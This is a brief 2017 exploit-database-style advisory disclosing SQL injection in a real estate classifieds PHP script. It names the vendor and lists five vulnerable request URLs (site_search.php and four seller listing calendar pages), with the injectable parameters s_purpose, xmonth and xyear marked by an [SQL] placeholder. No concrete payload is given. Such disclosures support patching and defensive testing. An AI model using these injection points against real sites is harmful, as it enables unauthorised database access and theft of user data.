Real Estate Classifieds script suffers from a remote SQL injection vulnerability.
9efa7381b52e559d1789607e331e0a6a
# # # # #
# Exploit Title: Real Estate Classifieds Script - SQL Injection
# Dork: N/A
# Date: 12.06.2017
# Vendor : http://www.easyrealestatescript.com/
# Software: http://www.easyrealestatescript.com/demo.html
# Demo: http://www.easyrealestatescript.com/demo.html
# Version: N/A
# # # # #
# Author: EziBilisim
# Author Web: https://ezibilisim.com/
# Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar.
# # # # #
# SQL Injection :
# http://localhost/[PATH]/site_search.php?s_purpose=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_title.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_prev.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_next.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_big.php?listing=&xmonth=[SQL]&xyear=[SQL]
# # # # #